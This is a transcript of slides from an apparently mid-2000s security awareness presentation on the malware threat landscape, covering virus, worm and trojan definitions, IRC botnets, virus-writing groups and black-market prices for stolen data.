intro to cobit part 1 threat landscape presented by george grachis cissp
TRANSCRIPT
Intro to COBIT
Part 1 Threat LandscapePresented by George Grachis
CISSP
Current Trends
UCLA Database Hacked
Hacker attack at UCLA affects 800,000 people
POSTED: 2:50 p.m. EST, December 12, 2006
UCLA says hacker invaded database for more than a year• Info exposed on about 800,000 students, faculty, staff• Data included Social Security numbers, birth dates, addresses• UCLA: No evidence any data have been misused
Malware Defined
What is malicious code?
As the name implies, it is software that is designed and developed with malicious intent. This includes gaining unauthorized access, network vandalism, theft of data or services, and destruction of software, data, or systems. We classify malicious code as : Trojan Horses Worms Viruses
Trojan Horses
A trojan horse is a generic term used to describe a computer program containing an apparent or actual useful function that also contains additional (hidden) functions that allows unauthorized collection, falsification, or destruction of data
Viruses
A virus is a program that "infects" other programs by modifying them to include a copy of itself.
A virus must have two functional elements: A search routine to locate new files or areas
to infect and A copy routine so it can replicate itself into
the file or area located by the search routine
This is what distinguishes a virus from other forms of malicious code.
Worms
Worms are similar to viruses, but replicate in their entirety, creating exact copies of themselves, without needing a "carrier" program. Worms are normally found on computer networks and multi-user computers, and use inter-computer or inter-user communications (E-mail) as the transmission medium.
How does malicious code initially get in to a computer?
Malicious code can invade a system through any of the normal means we use to communicate, transfer, or share software and data.
This includes: Diskettes, tapes, CD-ROM, and any other portable media
Infections also occur from the use of new diskettes, new (shrink wrapped) software, and new computer systems. Communications systems and services
The primary means of infection today is by receiving infected files via e-mail as attachments
Propagation via e-mail
Built-in SMTP engines in malicious code allows the infected system to send infected e-mail without the owner’s knowledge
Search files with extensions adb, asp, dbx, doc, eml, htm, html, msg, oft, php, pl, rtf, sht, tbb, txt, uin, vbs, wab and / or others for e-mail addresses to send infected e-mail.
Subject and Body are designed to entice a person to open and read the e-mail and attachment.
How does malicious code spread? Sharing software through the use of
media and transferring files across networks (to include the Internet), are the most common form of spreading malicious code.
A virus or worm on a infected system will also propagate through network shares by dropping copies of itself to or infecting shared folders.
Infections also occur from the use of new diskettes, new (shrink wrapped) software, and new computer systems
How is malicious code activated?
Malicious code are only activated if it is executed.
In the case of .COM, .EXE, .SYS, infected files it is easy to see how they are executed.
Boot Sectors and master boot records are “executed” when the computer attempts to boot from a floppy diskette or hard drive.
.DOC, .XLS, and other MS Office files files aren’t “executed” in a strict sense. The macros that are a part of the file ARE executed, this is where the virus resides.
Design flaws in application software can cause them to automatically execute e-mail attachments.
How can malicious code impact a system? Retrieve cached passwords / data files (e.g. theft of
sensitive / privacy related information) Download and execute a file (typically to install a
backdoor) Keystroke logging (e.g. theft of sensitive / privacy
related information) Delete files / format hard drive Copy files (usually copies of itself for reactivation) Write to files (e.g. data corruption) / registry (e.g.
control the infected system) Terminate processes (typically antiviral and firewall
software) Open port(s) on the victim's computer, connect to a
backdoor web server and achieve a level of control over the infected computer
What are the symptoms and indications of an infection?
What do you look for?
Note abnormal or unexpected activity such as: Displays, music, or other sounds Slowdown in processing speed Unusual disk activity Strange error messages Unexpected or unexplained changes in file sizes Loss of programs or data
These symptoms don't necessarily mean you are infected, only that you MIGHT be infected
Organized Crime
Malicious code authors have formed groups and associations to facilitate the proliferation and development of their wares.
Groups have appeared in most countries around the world, some of them even have an international constituency.
The following slide will give you some idea as to some of the malicious code authoring groups that are or have been in existence
Malicious Code Authoring Groups
29A (Spain)Australian Institute of Hackers (Australia)
Alliance (International)A New Order of Intelligence (Sweden)
Corea Virus Club (Korea)Digital Anarchy (Argentina)
Diabolical Kreations (Paraguay)Death Virii Crew (Russia)
No Mercy (Indonesia)Phalcon-Skism (USA/Canada)
TridenT (Netherlands)Taiwan Power Virus Organization (Taiwan)
Youths Against McAfee (USA)and dozens more...
Newsletters & e-Zines 29A 40 Hex Anaconda ARCV Newsletter AVCR Journal Censor Chaos AD Chiba City Times CPI Newsletter Crypt Newsletter Evolution
God@rky's V.H.N. Immortal EAS Virus
Magazine Infected Moscow Infected Voice Infectious Disease
Magazine Insane Reality Magazine Minotauro Magazine Nemesis Source Of Kaos and many more...
Malicious code authors and groups have also prepared and developed tutorials covering virtually all aspects of malicious code development.
The tutorials are also freely available on the Internet. The following slide shows just a sampling of some of the tutorials available.
Tutorials The Virus Writer's Handbook (Terminator Z) Virus Infection Tutorial 0.3 (Pocket) Batch Viruses by Wavefunc Macro Virus Tutorial (Dark Night) Mutation Engines (JHB) Guide to improving Polymorphic Engines (Rogue Warrior) Argument for slow infection and slow polymorphism (Rogue
Warrior) Infection on Compression (MGL/SVL) The SFT stealth tutorial (MGL/SVL) Self Checking Executable Files (Demogorgon) Upper Memory Residency (IntrusO) Interleaved Encryption Technique (Stomach Contents) and many, many more...
Malware Applications
Why are there so many viruses, trojan horses, and worms?
The availability of source code is also a main factor in proliferation.
Many malicious code authors make their source code freely available through the Internet and electronic chat rooms.
Bots
The word bot is an abbreviation of the word robot. Robots are frequently used in the Internet world.
Spiders used by search engines to map websites and software responding to requests on IRC (such as eggdrop) are robots
IRC and BOTS
IRC stands for Internet Relay Chat. It is a protocol designed for real time chat communication (reference to RFC 1459, update RFC 2810, 2811, 2812, 2813), based on client-server architecture.
Most IRC servers allow free access for everyone.
Bots
An IRC server connects to other IRC servers within the same network.
IRC users can communicate both in public on channels or in private (one to one). There are two basic levels of access to IRC channels: users and operators. A user who creates a channel becomes its operator.
An operator has more priviledges than a regular user.
Bots
IRC bots are treated no different than regular users (or operators).
Control over these bots is usually based on sending commands to a channel set-up by the attacker, infested with bots.
An important feature of such bots is the fact that they are able to spread rapidly to other computers
Many zombie (bot infected computers) networks have been controlled with the use of proprietary tools, developed intentionally by crackers themselves.
IRC is considered the best way to launch attacks, because it’s flexible, easy to use and public servers are readily available.
IRC offers a simple method to control hundreds or even thousands of bots at once in a flexible manner..
Sniffing & Key logging Bots can also be effectively used to
enhance the art of sniffing. Observing traffic data can lead to
detection of an incredible amount of information. This includes user habits, TCP packet payload which could contain interesting information (such as passwords).
The same applies to key logging – capturing all the information typed in by the user (e–mails, passwords, home banking data, PayPal account info etc.).
Identity Theft
The above mentioned methods allow an attacker controlling a bot-net to collect an incredible amount of personal information.
Such data can then be used to build fake identities, which can in turn be used to obtain access to personal accounts or perform various operations (including other attacks) shifting the blame to someone else.
Hosting of Illegal Software Last, but not least, bot compromised computers
can be used as a dynamic repository of illegal material (pirated software, pornography, etc.). The data is stored on the disk of an unaware home or business Broadband user.
Hours could be spent talking about the possible applications of bot-nets (for example pay per click abuse, phishing, hijacking HTTP/HTTPS connections etc.). Bots alone are only tools, which can easily be adapted to every task which requires a great number of hosts under single control.
Different Types of Bots
Many types of ready–made bots are available for download from the Internet. Each of them has its own special features.
Let's have a look at the most popular bot outlining common features and distinctive elements.
Agobot Agobot is probably one of the most popular
bots used by crackers. What is interesting about Agobot is its source
code. Highly modular, it makes it simple to add new functions.
Agobot provides many mechanisms to hide its presence on the host computer. They include: NTFS Alternate Data Stream, Antivirus Killer and the Polymorphic Encryptor Engine.
Agobot offers traffic sniffing and sorting functionality. Protocols other than IRC can also be used to control this bot.
Hacker Tools
How easy is it to create a virus using an automated creation tool?
An 8 year-old can do it!
It’s as simple as making a few selections on the menu-driven creation tool. The following slides will take you through the process of using a menu-driven, automated creation tool to create a unique, custom made macro virus.
Software For 2007 ! Guide to Hacking 2007 (NEW) Hacker Training Suite (NEW) Digital Cable Hacking CD (NEW) Chat System Hacker '07 (NEW) The Master Hacker PRO (NEW) Hackers Tool Chest PRO(NEW) WiFi Wireless Hacking (NEW) Internet Spy PRO Password Stealers '07 CD(NEW) Smart Guide to Hacking(NEW) Serials & Reg Keys Expanded Special Edition Hackers(NEW) Virus & Trojans 2006 Internet Detective 2007 (NEW) Hardware For 2007 ! NEW Handheld Credit Card Reader
SECTION: CREDIT & FINANCES
Identity Fraud Book Portable Credit & Magnetic Card Reader/ Writer
Windows Magnetic Strip Hacking Software The Ultimate Credit Card Hacking Bible
Blank Magnetic Swipe Cards Credit Card Hacking Software CD Combo
Why is malicious code successful?
Lack of training and awareness Using out-of-date anti-virus products Absence of or inadequate security
controls Ineffective use of existing security
controls Bugs and loopholes in system software Unauthorized use of software Network misuse
What’s Next
Expect to see increased use of social networks that link users. These networks allow people with common personal or professional interests to find each other easily.
The linking of users or networks also gives attackers a method to attack multiple users through one entity or through a web of the network.
As the use of RSS (Really Simple Syndication) becomes more prevalent, today’s software may not handle attacks well.
Frequent updates of RSS, along with the embedding of downloads and encoding through a variety of XML formats, can lead to undetected infections.
As more applications become embedded within browsers (for example, a spreadsheet program that can be loaded within the browser), the web will become more of an application platform, leading to more opportunities for security vulnerabilities and problems.
The use of “underground” business tools will also increase. We will see the types and availability of certain types of toolkits – such as those for vulnerability testing – getting better, which bodes well for both researcher and criminal.
For example, new technology – fuzzers – can automatically run a series of tests (millions of tests) against an application, searching for errors in the code.
The blackhat and whitehat markets for zero-day threats will increase, and the number of entities offering “rewards” to researchers who find and report vulnerabilities will likewise also increase.
We will also see increased organization, sharing, trading, and commerce in the underground with regards to zero-day exploit code.
Black Market
$980.00-$4900 Trojan Program to steal online account information.
$490.00 Credit Card with PIN $78.00-$294 Billing data w SSN, Address. $147.00 Drivers License $147.00 Birth Certificate $98.00 Social Security Card $6 Paypal Account w Logon & password
We will see more and more privacy issues connected to storage of personal, private, and confidential business data on the internet.
As more and more people use the internet, more goods and services transactions will take place over the web
Signing up for services, buying goods from web-based businesses, for example.
As this happens, the danger of leaking data increases. For example, many companies offer 2GB of free personal storage space.
End of Part 1